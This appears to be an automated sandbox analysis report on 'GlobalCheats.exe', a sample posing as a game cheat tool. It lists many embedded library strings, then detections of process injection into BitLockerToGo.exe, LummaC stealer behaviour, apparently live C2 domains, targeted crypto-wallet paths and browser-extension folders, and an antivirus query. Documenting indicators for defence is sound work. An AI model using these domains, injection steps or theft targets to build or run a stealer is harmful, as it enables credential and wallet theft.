Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.CreateProfileRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ReplicationGroupId
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RemoveVirtualNicRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*RDMPointsToInaccessibleDisk).GetCannotAccessVmDisk
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*UnsharedSwapVMotionNotSupportedFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.WeeklyTaskScheduler
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DatastoreFileEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfPropertyExport).GetOvfExport
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CreateTaskAction).GetAction
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmMonitorIncompatibleForFaultToleranceFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: &types.ArrayOfVirtualMachineVcpuConfig&[]types.VirtualMachineVgpuProfileInfo&func() types.VmfsDatastoreBaseOption
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ProfileCompositePolicyOptionMetadata).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostScsiTopology).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*EVCConfigFault).GetEVCConfigFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.UpdateIpmiRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostCnxFailedAccountFailedEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualEnsoniq1371Option).GetVirtualDeviceOption
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: *GetVirtualMachineBaseIndependentFilterSpec
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*StorageDrsHmsUnreachable).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidDatastorePathFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmGuestShutdownEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*GuestRegistryFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.FindAllByDnsName
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*GhostDvsProxySwitchDetectedEvent).GetHostEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostCnxFailedBadCcagentEvent).GetEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfPropertyQualifierIgnoredFault).GetOvfInvalidPackage
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ClockSkewFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: RightGui(xml:"rightGui" json:"rightGui,omitempty"1*[]types.VirtualMachineConfigInfoDatastoreUrlPair
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfMissingElementNormalBoundary).GetOvfMissingElement
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualVideoCardOption).GetVirtualDeviceOption
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DvsIpNetworkRuleQualifier).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RetrieveSnapshotInfo
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ImportOperationBulkFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ListFilesInGuestRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*RDMNotPreserved).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .*types.VirtualMachineMetadataManagerVmMetadata
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.SetLocaleRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*NotAFileFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CustomizationFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*NonADUserRequiredFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmNoCompatibleHostForSecondaryEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*AlarmRemovedEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmPoweringOnWithCustomizedDVPortEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.StartProgramInGuestRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.QueryHostStatus
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostVfatVolume).GetHostFileSystemVolume
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*EnteringStandbyModeEvent).GetHostEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1190
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1191
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DvsPortReconfiguredEvent).GetEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ImportCertificateForCAM_Task
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1192
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1193
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1194
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1195
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1196
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DrsInvocationFailedEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VMotionNotLicensed).GetVMotionInterfaceIssue
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualDeviceRemoteDeviceBackingOption).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.HostPosixAccountSpec
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DuplicateDisks).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*UncustomizableGuestFault).GetCustomizationFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ReconfigureDatacenter_Task
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmfsDatastoreAllExtentOption).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.UnassignUserFromGroup
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DisallowedMigrationDeviceAttached).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*UnconfiguredPropertyValue).GetInvalidPropertyValue
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1197
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1198
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1199
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualMachineCapability).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ReplicationFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CustomizationUnknownIpV6Generator).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ImportHostAddFailureFault).GetDvsFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1180
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1181
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1182
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1183
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DvsUpgradeAvailableEvent).GetEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1184
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1185
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.UploadClientCertRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ResourceAllocationOption
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.DrsExitedStandbyModeEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidNetworkInType).GetVAppPropertyFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmDeployedEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RetrieveClientCertRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1186
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1187
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/xml.(*printer).Buffered
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1188
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1189
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualMachineVideoCard).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*MismatchedVMotionNetworkNames).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VsanNewPolicyBatch).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1170
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1171
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualSerialPortThinPrintBackingOption).GetVirtualDeviceBackingOption
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1172
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1173
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1174
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*IscsiFaultPnicInUse).GetIscsiFault

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_032E6BC0 LdrInitializeThunk,

4_2_032E6BC0

Source: C:\Users\user\Desktop\GlobalCheats.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: GlobalCheats.exe PID: 6764, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\GlobalCheats.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 32B0000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\GlobalCheats.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 32B0000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: richardflorespoew.shop
Source: GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: strwawrunnygjwu.shop
Source: GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: justifycanddidatewd.shop
Source: GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: raiseboltskdlwpow.shop
Source: GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: falseaudiencekd.shop
Source: GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: pleasurenarrowsdla.shop
Source: GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: feighminoritsjda.shop
Source: GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: marathonbeedksow.shop
Source: GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: backcreammykiel.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\GlobalCheats.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 32B0000			Jump to behavior
Source: C:\Users\user\Desktop\GlobalCheats.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3001008			Jump to behavior

Source: C:\Users\user\Desktop\GlobalCheats.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Jump to behavior

Source: C:\Users\user\Desktop\GlobalCheats.exe	Queries volume information: C:\Users\user\Desktop\GlobalCheats.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GlobalCheats.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GlobalCheats.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GlobalCheats.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GlobalCheats.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GlobalCheats.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GlobalCheats.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3592, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected MicroClip

Source: Yara match	File source: 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GlobalCheats.exe PID: 6764, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BitLockerToGo.exe, 00000004.00000002.2076656236.0000000003612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: BitLockerToGo.exe, 00000004.00000003.2075627627.0000000003669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s/ElectronCash
Source: BitLockerToGo.exe, 00000004.00000002.2076656236.0000000003612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: BitLockerToGo.exe, 00000004.00000002.2076656236.0000000003612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000004.00000003.1988270990.000000000362D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
Source: BitLockerToGo.exe, 00000004.00000003.1988270990.000000000362D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: { "en": "aholpfdialjgjfhomihkjbmgjidlcdno", "ez": "ExodusWeb3" },
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: github.com/go-playground/validator/v10.isEthereumAddress
Source: BitLockerToGo.exe, 00000004.00000003.2075787639.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BitLockerToGo.exe, 00000004.00000003.1988270990.000000000362D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "m": ["keystore"],

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
